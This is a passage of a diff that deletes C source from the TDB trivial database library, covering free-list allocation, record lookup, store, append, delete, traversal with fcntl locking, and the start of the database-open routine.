-static tdb_off tdb_allocate_ofs(TDB_CONTEXT *tdb, tdb_len length, tdb_off rec_ptr,
-                               struct list_struct *rec, tdb_off last_ptr)
-{
-       struct list_struct newrec;
-       tdb_off newrec_ptr;
-
-       memset(&newrec, '\0', sizeof(newrec));
-
-       /* found it - now possibly split it up  */
-       if (rec->rec_len > length + MIN_REC_SIZE) {
-               /* Length of left piece */
-               length = TDB_ALIGN(length, TDB_ALIGNMENT);
-               
-               /* Right piece to go on free list */
-               newrec.rec_len = rec->rec_len - (sizeof(*rec) + length);
-               newrec_ptr = rec_ptr + sizeof(*rec) + length;
-               
-               /* And left record is shortened */
-               rec->rec_len = length;
-       } else {
-               newrec_ptr = 0;
-       }
-       
-       /* Remove allocated record from the free list */
-       if (ofs_write(tdb, last_ptr, &rec->next) == -1) {
-               return 0;
-       }
-       
-       /* Update header: do this before we drop alloc
-          lock, otherwise tdb_free() might try to
-          merge with us, thinking we're free.
-          (Thanks Jeremy Allison). */
-       rec->magic = TDB_MAGIC;
-       if (rec_write(tdb, rec_ptr, rec) == -1) {
-               return 0;
-       }
-       
-       /* Did we create new block? */
-       if (newrec_ptr) {
-               /* Update allocated record tailer (we
-                  shortened it). */
-               if (update_tailer(tdb, rec_ptr, rec) == -1) {
-                       return 0;
-               }
-               
-               /* Free new record */
-               if (tdb_free(tdb, newrec_ptr, &newrec) == -1) {
-                       return 0;
-               }
-       }
-       
-       /* all done - return the new record offset */
-       return rec_ptr;
-}
-
-/* allocate some space from the free list. The offset returned points
-   to a unconnected list_struct within the database with room for at
-   least length bytes of total data
-
-   0 is returned if the space could not be allocated
- */
-static tdb_off tdb_allocate(TDB_CONTEXT *tdb, tdb_len length,
-                           struct list_struct *rec)
-{
-       tdb_off rec_ptr, last_ptr, newrec_ptr;
-       struct {
-               tdb_off rec_ptr, last_ptr;
-               tdb_len rec_len;
-       } bestfit = { 0, 0, 0 };
-
-       if (tdb_lock(tdb, -1, F_WRLCK) == -1)
-               return 0;
-
-       /* Extra bytes required for tailer */
-       length += sizeof(tdb_off);
-
- again:
-       last_ptr = FREELIST_TOP;
-
-       /* read in the freelist top */
-       if (ofs_read(tdb, FREELIST_TOP, &rec_ptr) == -1)
-               goto fail;
-
-       bestfit.rec_ptr = 0;
-
-       /* 
-          this is a best fit allocation strategy. Originally we used
-          a first fit strategy, but it suffered from massive fragmentation
-          issues when faced with a slowly increasing record size.
-        */
-       while (rec_ptr) {
-               if (rec_free_read(tdb, rec_ptr, rec) == -1) {
-                       goto fail;
-               }
-
-               if (rec->rec_len >= length) {
-                       if (bestfit.rec_ptr == 0 ||
-                           rec->rec_len < bestfit.rec_len) {
-                               bestfit.rec_len = rec->rec_len;
-                               bestfit.rec_ptr = rec_ptr;
-                               bestfit.last_ptr = last_ptr;
-                               /* consider a fit to be good enough if we aren't wasting more than half the space */
-                               if (bestfit.rec_len < 2*length) {
-                                       break;
-                               }
-                       }
-               }
-
-               /* move to the next record */
-               last_ptr = rec_ptr;
-               rec_ptr = rec->next;
-       }
-
-       if (bestfit.rec_ptr != 0) {
-               if (rec_free_read(tdb, bestfit.rec_ptr, rec) == -1) {
-                       goto fail;
-               }
-
-               newrec_ptr = tdb_allocate_ofs(tdb, length, bestfit.rec_ptr, rec, bestfit.last_ptr);
-               tdb_unlock(tdb, -1, F_WRLCK);
-               return newrec_ptr;
-       }
-
-       /* we didn't find enough space. See if we can expand the
-          database and if we can then try again */
-       if (tdb_expand(tdb, length + sizeof(*rec)) == 0)
-               goto again;
- fail:
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return 0;
-}
-
-/* initialise a new database with a specified hash size */
-static int tdb_new_database(TDB_CONTEXT *tdb, int hash_size)
-{
-       struct tdb_header *newdb;
-       int size, ret = -1;
-
-       /* We make it up in memory, then write it out if not internal */
-       size = sizeof(struct tdb_header) + (hash_size+1)*sizeof(tdb_off);
-       if (!(newdb = talloc_zero_size(tdb, size)))
-               return TDB_ERRCODE(TDB_ERR_OOM, -1);
-
-       /* Fill in the header */
-       newdb->version = TDB_VERSION;
-       newdb->hash_size = hash_size;
-       if (tdb->flags & TDB_INTERNAL) {
-               tdb->map_size = size;
-               tdb->map_ptr = (char *)newdb;
-               memcpy(&tdb->header, newdb, sizeof(tdb->header));
-               /* Convert the `ondisk' version if asked. */
-               CONVERT(*newdb);
-               return 0;
-       }
-       if (lseek(tdb->fd, 0, SEEK_SET) == -1)
-               goto fail;
-
-       if (ftruncate(tdb->fd, 0) == -1)
-               goto fail;
-
-       /* This creates an endian-converted header, as if read from disk */
-       CONVERT(*newdb);
-       memcpy(&tdb->header, newdb, sizeof(tdb->header));
-       /* Don't endian-convert the magic food! */
-       memcpy(newdb->magic_food, TDB_MAGIC_FOOD, strlen(TDB_MAGIC_FOOD)+1);
-       if (write(tdb->fd, newdb, size) != size)
-               ret = -1;
-       else
-               ret = 0;
-
-  fail:
-       SAFE_FREE(newdb);
-       return ret;
-}
-
-/* Returns 0 on fail.  On success, return offset of record, and fills
-   in rec */
-static tdb_off tdb_find(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash,
-                       struct list_struct *r)
-{
-       tdb_off rec_ptr;
-       
-       /* read in the hash top */
-       if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1)
-               return 0;
-
-       /* keep looking until we find the right record */
-       while (rec_ptr) {
-               if (rec_read(tdb, rec_ptr, r) == -1)
-                       return 0;
-
-               if (!TDB_DEAD(r) && hash==r->full_hash && key.dsize==r->key_len) {
-                       /* a very likely hit - read the key */
-                       int cmp = tdb_key_eq(tdb, rec_ptr + sizeof(*r), key);
-                       if (cmp < 0)
-                               return 0;
-                       else if (cmp > 0)
-                               return rec_ptr;
-               }
-               rec_ptr = r->next;
-       }
-       return TDB_ERRCODE(TDB_ERR_NOEXIST, 0);
-}
-
-/* As tdb_find, but if you succeed, keep the lock */
-static tdb_off tdb_find_lock_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, int locktype,
-                            struct list_struct *rec)
-{
-       uint32_t rec_ptr;
-
-       if (tdb_lock(tdb, BUCKET(hash), locktype) == -1)
-               return 0;
-       if (!(rec_ptr = tdb_find(tdb, key, hash, rec)))
-               tdb_unlock(tdb, BUCKET(hash), locktype);
-       return rec_ptr;
-}
-
-enum TDB_ERROR tdb_error(TDB_CONTEXT *tdb)
-{
-       return tdb->ecode;
-}
-
-static struct tdb_errname {
-       enum TDB_ERROR ecode; const char *estring;
-} emap[] = { {TDB_SUCCESS, "Success"},
-            {TDB_ERR_CORRUPT, "Corrupt database"},
-            {TDB_ERR_IO, "IO Error"},
-            {TDB_ERR_LOCK, "Locking error"},
-            {TDB_ERR_OOM, "Out of memory"},
-            {TDB_ERR_EXISTS, "Record exists"},
-            {TDB_ERR_NOLOCK, "Lock exists on other keys"},
-            {TDB_ERR_NOEXIST, "Record does not exist"} };
-
-/* Error string for the last tdb error */
-const char *tdb_errorstr(TDB_CONTEXT *tdb)
-{
-       uint32_t i;
-       for (i = 0; i < sizeof(emap) / sizeof(struct tdb_errname); i++)
-               if (tdb->ecode == emap[i].ecode)
-                       return emap[i].estring;
-       return "Invalid error code";
-}
-
-/* update an entry in place - this only works if the new data size
-   is <= the old data size and the key exists.
-   on failure return -1.
-*/
-
-static int tdb_update_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, TDB_DATA dbuf)
-{
-       struct list_struct rec;
-       tdb_off rec_ptr;
-
-       /* find entry */
-       if (!(rec_ptr = tdb_find(tdb, key, hash, &rec)))
-               return -1;
-
-       /* must be long enough key, data and tailer */
-       if (rec.rec_len < key.dsize + dbuf.dsize + sizeof(tdb_off)) {
-               tdb->ecode = TDB_SUCCESS; /* Not really an error */
-               return -1;
-       }
-
-       if (tdb_write(tdb, rec_ptr + sizeof(rec) + rec.key_len,
-                     dbuf.dptr, dbuf.dsize) == -1)
-               return -1;
-
-       if (dbuf.dsize != rec.data_len) {
-               /* update size */
-               rec.data_len = dbuf.dsize;
-               return rec_write(tdb, rec_ptr, &rec);
-       }
- 
-       return 0;
-}
-
-/* find an entry in the database given a key */
-/* If an entry doesn't exist tdb_err will be set to
- * TDB_ERR_NOEXIST. If a key has no data attached
- * then the TDB_DATA will have zero length but
- * a non-zero pointer
- */
-
-TDB_DATA tdb_fetch(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       tdb_off rec_ptr;
-       struct list_struct rec;
-       TDB_DATA ret;
-       uint32_t hash;
-
-       /* find which hash bucket it is in */
-       hash = tdb->hash_fn(&key);
-       if (!(rec_ptr = tdb_find_lock_hash(tdb,key,hash,F_RDLCK,&rec)))
-               return tdb_null;
-
-       ret.dptr = tdb_alloc_read(tdb, rec_ptr + sizeof(rec) + rec.key_len,
-                                 rec.data_len);
-       ret.dsize = rec.data_len;
-       tdb_unlock(tdb, BUCKET(rec.full_hash), F_RDLCK);
-       return ret;
-}
-
-/* check if an entry in the database exists 
-
-   note that 1 is returned if the key is found and 0 is returned if not found
-   this doesn't match the conventions in the rest of this module, but is
-   compatible with gdbm
-*/
-static int tdb_exists_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash)
-{
-       struct list_struct rec;
-       
-       if (tdb_find_lock_hash(tdb, key, hash, F_RDLCK, &rec) == 0)
-               return 0;
-       tdb_unlock(tdb, BUCKET(rec.full_hash), F_RDLCK);
-       return 1;
-}
-
-int tdb_exists(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       uint32_t hash = tdb->hash_fn(&key);
-       return tdb_exists_hash(tdb, key, hash);
-}
-
-/* record lock stops delete underneath */
-static int lock_record(TDB_CONTEXT *tdb, tdb_off off)
-{
-       return off ? tdb_brlock(tdb, off, F_RDLCK, F_SETLKW, 0) : 0;
-}
-/*
-  Write locks override our own fcntl readlocks, so check it here.
-  Note this is meant to be F_SETLK, *not* F_SETLKW, as it's not
-  an error to fail to get the lock here.
-*/
- 
-static int write_lock_record(TDB_CONTEXT *tdb, tdb_off off)
-{
-       struct tdb_traverse_lock *i;
-       for (i = &tdb->travlocks; i; i = i->next)
-               if (i->off == off)
-                       return -1;
-       return tdb_brlock(tdb, off, F_WRLCK, F_SETLK, 1);
-}
-
-/*
-  Note this is meant to be F_SETLK, *not* F_SETLKW, as it's not
-  an error to fail to get the lock here.
-*/
-
-static int write_unlock_record(TDB_CONTEXT *tdb, tdb_off off)
-{
-       return tdb_brlock(tdb, off, F_UNLCK, F_SETLK, 0);
-}
-/* fcntl locks don't stack: avoid unlocking someone else's */
-static int unlock_record(TDB_CONTEXT *tdb, tdb_off off)
-{
-       struct tdb_traverse_lock *i;
-       uint32_t count = 0;
-
-       if (off == 0)
-               return 0;
-       for (i = &tdb->travlocks; i; i = i->next)
-               if (i->off == off)
-                       count++;
-       return (count == 1 ? tdb_brlock(tdb, off, F_UNLCK, F_SETLKW, 0) : 0);
-}
-
-/* actually delete an entry in the database given the offset */
-static int do_delete(TDB_CONTEXT *tdb, tdb_off rec_ptr, struct list_struct*rec)
-{
-       tdb_off last_ptr, i;
-       struct list_struct lastrec;
-
-       if (tdb->read_only) return -1;
-
-       if (write_lock_record(tdb, rec_ptr) == -1) {
-               /* Someone traversing here: mark it as dead */
-               rec->magic = TDB_DEAD_MAGIC;
-               return rec_write(tdb, rec_ptr, rec);
-       }
-       if (write_unlock_record(tdb, rec_ptr) != 0)
-               return -1;
-
-       /* find previous record in hash chain */
-       if (ofs_read(tdb, TDB_HASH_TOP(rec->full_hash), &i) == -1)
-               return -1;
-       for (last_ptr = 0; i != rec_ptr; last_ptr = i, i = lastrec.next)
-               if (rec_read(tdb, i, &lastrec) == -1)
-                       return -1;
-
-       /* unlink it: next ptr is at start of record. */
-       if (last_ptr == 0)
-               last_ptr = TDB_HASH_TOP(rec->full_hash);
-       if (ofs_write(tdb, last_ptr, &rec->next) == -1)
-               return -1;
-
-       /* recover the space */
-       if (tdb_free(tdb, rec_ptr, rec) == -1)
-               return -1;
-       return 0;
-}
-
-/* Uses traverse lock: 0 = finish, -1 = error, other = record offset */
-static int tdb_next_lock(TDB_CONTEXT *tdb, struct tdb_traverse_lock *tlock,
-                        struct list_struct *rec)
-{
-       int want_next = (tlock->off != 0);
-
-       /* Lock each chain from the start one. */
-       for (; tlock->hash < tdb->header.hash_size; tlock->hash++) {
-
-               /* this is an optimisation for the common case where
-                  the hash chain is empty, which is particularly
-                  common for the use of tdb with ldb, where large
-                  hashes are used. In that case we spend most of our
-                  time in tdb_brlock(), locking empty hash chains.
-
-                  To avoid this, we do an unlocked pre-check to see
-                  if the hash chain is empty before starting to look
-                  inside it. If it is empty then we can avoid that
-                  hash chain. If it isn't empty then we can't believe
-                  the value we get back, as we read it without a
-                  lock, so instead we get the lock and re-fetch the
-                  value below.
-
-                  Notice that not doing this optimisation on the
-                  first hash chain is critical. We must guarantee
-                  that we have done at least one fcntl lock at the
-                  start of a search to guarantee that memory is
-                  coherent on SMP systems. If records are added by
-                  others during the search then thats OK, and we
-                  could possibly miss those with this trick, but we
-                  could miss them anyway without this trick, so the
-                  semantics don't change.
-
-                  With a non-indexed ldb search this trick gains us a
-                  factor of around 80 in speed on a linux 2.6.x
-                  system (testing using ldbtest).
-                */
-               if (!tlock->off && tlock->hash != 0) {
-                       uint32_t off;
-                       if (tdb->map_ptr) {
-                               for (;tlock->hash < tdb->header.hash_size;tlock->hash++) {
-                                       if (0 != *(uint32_t *)(TDB_HASH_TOP(tlock->hash) + (unsigned char *)tdb->map_ptr)) {
-                                               break;
-                                       }
-                               }
-                               if (tlock->hash == tdb->header.hash_size) {
-                                       continue;
-                               }
-                       } else {
-                               if (ofs_read(tdb, TDB_HASH_TOP(tlock->hash), &off) == 0 &&
-                                   off == 0) {
-                                       continue;
-                               }
-                       }
-               }
-
-               if (tdb_lock(tdb, tlock->hash, F_WRLCK) == -1)
-                       return -1;
-
-               /* No previous record?  Start at top of chain. */
-               if (!tlock->off) {
-                       if (ofs_read(tdb, TDB_HASH_TOP(tlock->hash),
-                                    &tlock->off) == -1)
-                               goto fail;
-               } else {
-                       /* Otherwise unlock the previous record. */
-                       if (unlock_record(tdb, tlock->off) != 0)
-                               goto fail;
-               }
-
-               if (want_next) {
-                       /* We have offset of old record: grab next */
-                       if (rec_read(tdb, tlock->off, rec) == -1)
-                               goto fail;
-                       tlock->off = rec->next;
-               }
-
-               /* Iterate through chain */
-               while( tlock->off) {
-                       tdb_off current;
-                       if (rec_read(tdb, tlock->off, rec) == -1)
-                               goto fail;
-
-                       /* Detect infinite loops. From "Shlomi Yaakobovich" <Shlomi@xxxxxxxxxx>. */
-                       if (tlock->off == rec->next) {
-                               TDB_LOG((tdb, 0, "tdb_next_lock: loop detected.\n"));
-                               goto fail;
-                       }
-
-                       if (!TDB_DEAD(rec)) {
-                               /* Woohoo: we found one! */
-                               if (lock_record(tdb, tlock->off) != 0)
-                                       goto fail;
-                               return tlock->off;
-                       }
-
-                       /* Try to clean dead ones from old traverses */
-                       current = tlock->off;
-                       tlock->off = rec->next;
-                       if (!tdb->read_only && 
-                           do_delete(tdb, current, rec) != 0)
-                               goto fail;
-               }
-               tdb_unlock(tdb, tlock->hash, F_WRLCK);
-               want_next = 0;
-       }
-       /* We finished iteration without finding anything */
-       return TDB_ERRCODE(TDB_SUCCESS, 0);
-
- fail:
-       tlock->off = 0;
-       if (tdb_unlock(tdb, tlock->hash, F_WRLCK) != 0)
-               TDB_LOG((tdb, 0, "tdb_next_lock: On error unlock failed!\n"));
-       return -1;
-}
-
-/* traverse the entire database - calling fn(tdb, key, data) on each element.
-   return -1 on error or the record count traversed
-   if fn is NULL then it is not called
-   a non-zero return value from fn() indicates that the traversal should stop
-  */
-int tdb_traverse(TDB_CONTEXT *tdb, tdb_traverse_func fn, void *private)
-{
-       TDB_DATA key, dbuf;
-       struct list_struct rec;
-       struct tdb_traverse_lock tl = { NULL, 0, 0 };
-       int ret, count = 0;
-
-       /* This was in the initializaton, above, but the IRIX compiler
-        * did not like it.  crh
-        */
-       tl.next = tdb->travlocks.next;
-
-       /* fcntl locks don't stack: beware traverse inside traverse */
-       tdb->travlocks.next = &tl;
-
-       /* tdb_next_lock places locks on the record returned, and its chain */
-       while ((ret = tdb_next_lock(tdb, &tl, &rec)) > 0) {
-               count++;
-               /* now read the full record */
-               key.dptr = tdb_alloc_read(tdb, tl.off + sizeof(rec), 
-                                         rec.key_len + rec.data_len);
-               if (!key.dptr) {
-                       ret = -1;
-                       if (tdb_unlock(tdb, tl.hash, F_WRLCK) != 0)
-                               goto out;
-                       if (unlock_record(tdb, tl.off) != 0)
-                               TDB_LOG((tdb, 0, "tdb_traverse: key.dptr == NULL and unlock_record failed!\n"));
-                       goto out;
-               }
-               key.dsize = rec.key_len;
-               dbuf.dptr = key.dptr + rec.key_len;
-               dbuf.dsize = rec.data_len;
-
-               /* Drop chain lock, call out */
-               if (tdb_unlock(tdb, tl.hash, F_WRLCK) != 0) {
-                       ret = -1;
-                       goto out;
-               }
-               if (fn && fn(tdb, key, dbuf, private)) {
-                       /* They want us to terminate traversal */
-                       ret = count;
-                       if (unlock_record(tdb, tl.off) != 0) {
-                               TDB_LOG((tdb, 0, "tdb_traverse: unlock_record failed!\n"));;
-                               ret = -1;
-                       }
-                       tdb->travlocks.next = tl.next;
-                       SAFE_FREE(key.dptr);
-                       return count;
-               }
-               SAFE_FREE(key.dptr);
-       }
-out:
-       tdb->travlocks.next = tl.next;
-       if (ret < 0)
-               return -1;
-       else
-               return count;
-}
-
-/* find the first entry in the database and return its key */
-TDB_DATA tdb_firstkey(TDB_CONTEXT *tdb)
-{
-       TDB_DATA key;
-       struct list_struct rec;
-
-       /* release any old lock */
-       if (unlock_record(tdb, tdb->travlocks.off) != 0)
-               return tdb_null;
-       tdb->travlocks.off = tdb->travlocks.hash = 0;
-
-       if (tdb_next_lock(tdb, &tdb->travlocks, &rec) <= 0)
-               return tdb_null;
-       /* now read the key */
-       key.dsize = rec.key_len;
-       key.dptr =tdb_alloc_read(tdb,tdb->travlocks.off+sizeof(rec),key.dsize);
-       if (tdb_unlock(tdb, BUCKET(tdb->travlocks.hash), F_WRLCK) != 0)
-               TDB_LOG((tdb, 0, "tdb_firstkey: error occurred while tdb_unlocking!\n"));
-       return key;
-}
-
-/* find the next entry in the database, returning its key */
-TDB_DATA tdb_nextkey(TDB_CONTEXT *tdb, TDB_DATA oldkey)
-{
-       uint32_t oldhash;
-       TDB_DATA key = tdb_null;
-       struct list_struct rec;
-       char *k = NULL;
-
-       /* Is locked key the old key?  If so, traverse will be reliable. */
-       if (tdb->travlocks.off) {
-               if (tdb_lock(tdb,tdb->travlocks.hash,F_WRLCK))
-                       return tdb_null;
-               if (rec_read(tdb, tdb->travlocks.off, &rec) == -1
-                   || !(k = tdb_alloc_read(tdb,tdb->travlocks.off+sizeof(rec),
-                                           rec.key_len))
-                   || memcmp(k, oldkey.dptr, oldkey.dsize) != 0) {
-                       /* No, it wasn't: unlock it and start from scratch */
-                       if (unlock_record(tdb, tdb->travlocks.off) != 0)
-                               return tdb_null;
-                       if (tdb_unlock(tdb, tdb->travlocks.hash, F_WRLCK) != 0)
-                               return tdb_null;
-                       tdb->travlocks.off = 0;
-               }
-
-               SAFE_FREE(k);
-       }
-
-       if (!tdb->travlocks.off) {
-               /* No previous element: do normal find, and lock record */
-               tdb->travlocks.off = tdb_find_lock_hash(tdb, oldkey, tdb->hash_fn(&oldkey), F_WRLCK, &rec);
-               if (!tdb->travlocks.off)
-                       return tdb_null;
-               tdb->travlocks.hash = BUCKET(rec.full_hash);
-               if (lock_record(tdb, tdb->travlocks.off) != 0) {
-                       TDB_LOG((tdb, 0, "tdb_nextkey: lock_record failed (%s)!\n", strerror(errno)));
-                       return tdb_null;
-               }
-       }
-       oldhash = tdb->travlocks.hash;
-
-       /* Grab next record: locks chain and returned record,
-          unlocks old record */
-       if (tdb_next_lock(tdb, &tdb->travlocks, &rec) > 0) {
-               key.dsize = rec.key_len;
-               key.dptr = tdb_alloc_read(tdb, tdb->travlocks.off+sizeof(rec),
-                                         key.dsize);
-               /* Unlock the chain of this new record */
-               if (tdb_unlock(tdb, tdb->travlocks.hash, F_WRLCK) != 0)
-                       TDB_LOG((tdb, 0, "tdb_nextkey: WARNING tdb_unlock failed!\n"));
-       }
-       /* Unlock the chain of old record */
-       if (tdb_unlock(tdb, BUCKET(oldhash), F_WRLCK) != 0)
-               TDB_LOG((tdb, 0, "tdb_nextkey: WARNING tdb_unlock failed!\n"));
-       return key;
-}
-
-/* delete an entry in the database given a key */
-static int tdb_delete_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash)
-{
-       tdb_off rec_ptr;
-       struct list_struct rec;
-       int ret;
-
-       if (!(rec_ptr = tdb_find_lock_hash(tdb, key, hash, F_WRLCK, &rec)))
-               return -1;
-       ret = do_delete(tdb, rec_ptr, &rec);
-       if (tdb_unlock(tdb, BUCKET(rec.full_hash), F_WRLCK) != 0)
-               TDB_LOG((tdb, 0, "tdb_delete: WARNING tdb_unlock failed!\n"));
-       return ret;
-}
-
-int tdb_delete(TDB_CONTEXT *tdb, TDB_DATA key)
-{
-       uint32_t hash = tdb->hash_fn(&key);
-       return tdb_delete_hash(tdb, key, hash);
-}
-
-/* store an element in the database, replacing any existing element
-   with the same key 
-
-   return 0 on success, -1 on failure
-*/
-int tdb_store(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA dbuf, int flag)
-{
-       struct list_struct rec;
-       uint32_t hash;
-       tdb_off rec_ptr;
-       char *p = NULL;
-       int ret = 0;
-
-       /* find which hash bucket it is in */
-       hash = tdb->hash_fn(&key);
-       if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1)
-               return -1;
-
-       /* check for it existing, on insert. */
-       if (flag == TDB_INSERT) {
-               if (tdb_exists_hash(tdb, key, hash)) {
-                       tdb->ecode = TDB_ERR_EXISTS;
-                       goto fail;
-               }
-       } else {
-               /* first try in-place update, on modify or replace. */
-               if (tdb_update_hash(tdb, key, hash, dbuf) == 0)
-                       goto out;
-               if (tdb->ecode == TDB_ERR_NOEXIST &&
-                   flag == TDB_MODIFY) {
-                       /* if the record doesn't exist and we are in TDB_MODIFY mode then
-                        we should fail the store */
-                       goto fail;
-               }
-       }
-       /* reset the error code potentially set by the tdb_update() */
-       tdb->ecode = TDB_SUCCESS;
-
-       /* delete any existing record - if it doesn't exist we don't
-           care.  Doing this first reduces fragmentation, and avoids
-           coalescing with `allocated' block before it's updated. */
-       if (flag != TDB_INSERT)
-               tdb_delete_hash(tdb, key, hash);
-
-       /* Copy key+value *before* allocating free space in case malloc
-          fails and we are left with a dead spot in the tdb. */
-
-       if (!(p = (char *)talloc_size(tdb, key.dsize + dbuf.dsize))) {
-               tdb->ecode = TDB_ERR_OOM;
-               goto fail;
-       }
-
-       memcpy(p, key.dptr, key.dsize);
-       if (dbuf.dsize)
-               memcpy(p+key.dsize, dbuf.dptr, dbuf.dsize);
-
-       /* we have to allocate some space */
-       if (!(rec_ptr = tdb_allocate(tdb, key.dsize + dbuf.dsize, &rec)))
-               goto fail;
-
-       /* Read hash top into next ptr */
-       if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec.next) == -1)
-               goto fail;
-
-       rec.key_len = key.dsize;
-       rec.data_len = dbuf.dsize;
-       rec.full_hash = hash;
-       rec.magic = TDB_MAGIC;
-
-       /* write out and point the top of the hash chain at it */
-       if (rec_write(tdb, rec_ptr, &rec) == -1
-           || tdb_write(tdb, rec_ptr+sizeof(rec), p, key.dsize+dbuf.dsize)==-1
-           || ofs_write(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) {
-               /* Need to tdb_unallocate() here */
-               goto fail;
-       }
- out:
-       SAFE_FREE(p); 
-       tdb_unlock(tdb, BUCKET(hash), F_WRLCK);
-       return ret;
-fail:
-       ret = -1;
-       goto out;
-}
-
-/* Attempt to append data to an entry in place - this only works if the new data size
-   is <= the old data size and the key exists.
-   on failure return -1. Record must be locked before calling.
-*/
-static int tdb_append_inplace(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, TDB_DATA new_dbuf)
-{
-       struct list_struct rec;
-       tdb_off rec_ptr;
-
-       /* find entry */
-       if (!(rec_ptr = tdb_find(tdb, key, hash, &rec)))
-               return -1;
-
-       /* Append of 0 is always ok. */
-       if (new_dbuf.dsize == 0)
-               return 0;
-
-       /* must be long enough for key, old data + new data and tailer */
-       if (rec.rec_len < key.dsize + rec.data_len + new_dbuf.dsize + sizeof(tdb_off)) {
-               /* No room. */
-               tdb->ecode = TDB_SUCCESS; /* Not really an error */
-               return -1;
-       }
-
-       if (tdb_write(tdb, rec_ptr + sizeof(rec) + rec.key_len + rec.data_len,
-                     new_dbuf.dptr, new_dbuf.dsize) == -1)
-               return -1;
-
-       /* update size */
-       rec.data_len += new_dbuf.dsize;
-       return rec_write(tdb, rec_ptr, &rec);
-}
-
-/* Append to an entry. Create if not exist. */
-
-int tdb_append(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA new_dbuf)
-{
-       struct list_struct rec;
-       uint32_t hash;
-       tdb_off rec_ptr;
-       char *p = NULL;
-       int ret = 0;
-       size_t new_data_size = 0;
-
-       /* find which hash bucket it is in */
-       hash = tdb->hash_fn(&key);
-       if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1)
-               return -1;
-
-       /* first try in-place. */
-       if (tdb_append_inplace(tdb, key, hash, new_dbuf) == 0)
-               goto out;
-
-       /* reset the error code potentially set by the tdb_append_inplace() */
-       tdb->ecode = TDB_SUCCESS;
-
-       /* find entry */
-       if (!(rec_ptr = tdb_find(tdb, key, hash, &rec))) {
-               if (tdb->ecode != TDB_ERR_NOEXIST)
-                       goto fail;
-
-               /* Not found - create. */
-
-               ret = tdb_store(tdb, key, new_dbuf, TDB_INSERT);
-               goto out;
-       }
-
-       new_data_size = rec.data_len + new_dbuf.dsize;
-
-       /* Copy key+old_value+value *before* allocating free space in case malloc
-          fails and we are left with a dead spot in the tdb. */
-
-       if (!(p = (char *)talloc_size(tdb, key.dsize + new_data_size))) {
-               tdb->ecode = TDB_ERR_OOM;
-               goto fail;
-       }
-
-       /* Copy the key in place. */
-       memcpy(p, key.dptr, key.dsize);
-
-       /* Now read the old data into place. */
-       if (rec.data_len &&
-               tdb_read(tdb, rec_ptr + sizeof(rec) + rec.key_len, p + key.dsize, rec.data_len, 0) == -1)
-                       goto fail;
-
-       /* Finally append the new data. */
-       if (new_dbuf.dsize)
-               memcpy(p+key.dsize+rec.data_len, new_dbuf.dptr, new_dbuf.dsize);
-
-       /* delete any existing record - if it doesn't exist we don't
-           care.  Doing this first reduces fragmentation, and avoids
-           coalescing with `allocated' block before it's updated. */
-
-       tdb_delete_hash(tdb, key, hash);
-
-       if (!(rec_ptr = tdb_allocate(tdb, key.dsize + new_data_size, &rec)))
-               goto fail;
-
-       /* Read hash top into next ptr */
-       if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec.next) == -1)
-               goto fail;
-
-       rec.key_len = key.dsize;
-       rec.data_len = new_data_size;
-       rec.full_hash = hash;
-       rec.magic = TDB_MAGIC;
-
-       /* write out and point the top of the hash chain at it */
-       if (rec_write(tdb, rec_ptr, &rec) == -1
-           || tdb_write(tdb, rec_ptr+sizeof(rec), p, key.dsize+new_data_size)==-1
-           || ofs_write(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) {
-               /* Need to tdb_unallocate() here */
-               goto fail;
-       }
-
- out:
-       SAFE_FREE(p); 
-       tdb_unlock(tdb, BUCKET(hash), F_WRLCK);
-       return ret;
-
-fail:
-       ret = -1;
-       goto out;
-}
-
-static int tdb_already_open(dev_t device,
-                           ino_t ino)
-{
-       TDB_CONTEXT *i;
-       
-       for (i = tdbs; i; i = i->next) {
-               if (i->device == device && i->inode == ino) {
-                       return 1;
-               }
-       }
-
-       return 0;
-}
-
-/* open the database, creating it if necessary 
-
-   The open_flags and mode are passed straight to the open call on the
-   database file. A flags value of O_WRONLY is invalid. The hash size
-   is advisory, use zero for a default value.
-
-   Return is NULL on error, in which case errno is also set.  Don't 
-   try to call tdb_error or tdb_errname, just do strerror(errno).
-
-   @param name may be NULL for internal databases. */
-TDB_CONTEXT *tdb_open(const char *name, int hash_size, int tdb_flags,
-                     int open_flags, mode_t mode)
-{
-       return tdb_open_ex(name, hash_size, tdb_flags, open_flags, mode, NULL, NULL);
-}
-
-/* a default logging function */
-static void null_log_fn(TDB_CONTEXT *tdb __attribute__((unused)),
-                       int level __attribute__((unused)),
-                       const char *fmt __attribute__((unused)), ...)
-{
-}
-
-
-TDB_CONTEXT *tdb_open_ex(const char *name, int hash_size, int tdb_flags,
-                        int open_flags, mode_t mode,
-                        tdb_log_func log_fn,
-                        tdb_hash_func hash_fn)
-{
-       TDB_CONTEXT *tdb;
-       struct stat st;
-       int rev = 0, locked = 0;
-       uint8_t *vp;
-       uint32_t vertest;
-
-       if (!(tdb = talloc_zero(name, TDB_CONTEXT))) {
-               /* Can't log this */
-               errno = ENOMEM;
-               goto fail;
-       }
-       tdb->fd = -1;
-       tdb->name = NULL;
-       tdb->map_ptr = NULL;
-       tdb->flags = tdb_flags;
-       tdb->open_flags = open_flags;
-       tdb->log_fn = log_fn?log_fn:null_log_fn;
-       tdb->hash_fn = hash_fn ? hash_fn : default_tdb_hash;
-
-       if ((open_flags & O_ACCMODE) == O_WRONLY) {
-               TDB_LOG((tdb, 0, "tdb_open_ex: can't open tdb %s write-only\n",
-                        name));
-               errno = EINVAL;
-               goto fail;
-       }
-       
-       if (hash_size == 0)
-               hash_size = DEFAULT_HASH_SIZE;
-       if ((open_flags & O_ACCMODE) == O_RDONLY) {
-               tdb->read_only = 1;
